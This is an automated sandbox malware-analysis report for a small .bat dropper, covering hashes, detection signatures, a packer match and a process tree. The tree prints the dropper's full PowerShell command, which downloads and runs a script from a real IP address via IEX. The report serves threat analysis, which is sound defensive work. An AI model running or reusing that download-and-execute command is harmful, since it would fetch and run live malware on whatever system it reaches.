Analysis
max time kernel: 120s
max time network: 123s
platform: windows10_x64
resource: win10
submitted: 04-08-2020 12:19
Static task: static1

Behavioral task: behavioral1
  Sample: 2b4587aed40db6e44cbff092b52b841e.bat
  Resource: win7 (windows7_x64)
  0 signatures, 0 seconds

Behavioral task: behavioral2
  Sample: 2b4587aed40db6e44cbff092b52b841e.bat
  Resource: win10 (windows10_x64)
  0 signatures, 0 seconds
General
Target: 2b4587aed40db6e44cbff092b52b841e.bat
Size: 218B
MD5: c69dabb8c2f1ca155fb5fe3b0482d0a7
SHA1: b3faaf0bd82fe27b076ec814b2123cf962ead51b
SHA256: 99824d3ef35b84b0fc40214867e3c54e5518491efa1c5c9d796b1acb2cbe81d7
SHA512: c5fc762e4d76e921bd55faa68fff86efe13f0b49b7cbeaaf2d4050cbb8e65f400399d84acf4056e36c8f560a8e9a7fd5b9c711fcb0ef23f65f14ea0724eef174
Score: 10/10
Malware Config
Extracted
  Language: ps1
  Source: ps1.dropper
  URLs: http://185.103.242.78/pastes/2b4587aed40db6e44cbff092b52b841e
Signatures

Suspicious use of WriteProcessMemory (3 IoCs)
Processes:
  description                        pid   process   target process
  PID 3908 wrote to memory of 3860   3908  cmd.exe   powershell.exe   (3 identical entries)

Program crash (1 IoC)
Processes:
  pid   pid_target  process       target process
  3592  3860        WerFault.exe  powershell.exe

Suspicious use of AdjustPrivilegeToken (3 IoCs)
Processes:
  description                 pid   process
  Token: SeRestorePrivilege   3592  WerFault.exe
  Token: SeBackupPrivilege    3592  WerFault.exe
  Token: SeDebugPrivilege     3592  WerFault.exe

Suspicious behavior: EnumeratesProcesses (15 IoCs)
Processes:
  pid   process
  3592  WerFault.exe   (15 identical entries)

ServiceHost packer (6 IoCs)
Detects ServiceHost packer used for .NET malware
Processes:
  resource                                                    yara_rule
  behavioral2/memory/3860-3-0x0000000000000000-mapping.dmp    servicehost
  behavioral2/memory/3860-2-0x0000000000000000-mapping.dmp    servicehost
  behavioral2/memory/3860-4-0x0000000000000000-mapping.dmp    servicehost
  behavioral2/memory/3860-5-0x0000000000000000-mapping.dmp    servicehost
  behavioral2/memory/3860-6-0x0000000000000000-mapping.dmp    servicehost
  behavioral2/memory/3860-7-0x0000000000000000-mapping.dmp    servicehost
Processes

1. C:\Windows\system32\cmd.exe
   Command line: C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\2b4587aed40db6e44cbff092b52b841e.bat"
   PID: 3908
   - Suspicious use of WriteProcessMemory

   2. C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      Command line: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/2b4587aed40db6e44cbff092b52b841e');Invoke-SLSOBOXXDQW;Start-Sleep -s 10000"
      PID: 3860

      3. C:\Windows\SysWOW64\WerFault.exe
         Command line: C:\Windows\SysWOW64\WerFault.exe -u -p 3860 -s 704
         PID: 3592
         - Program crash
         - Suspicious use of AdjustPrivilegeToken
         - Suspicious behavior: EnumeratesProcesses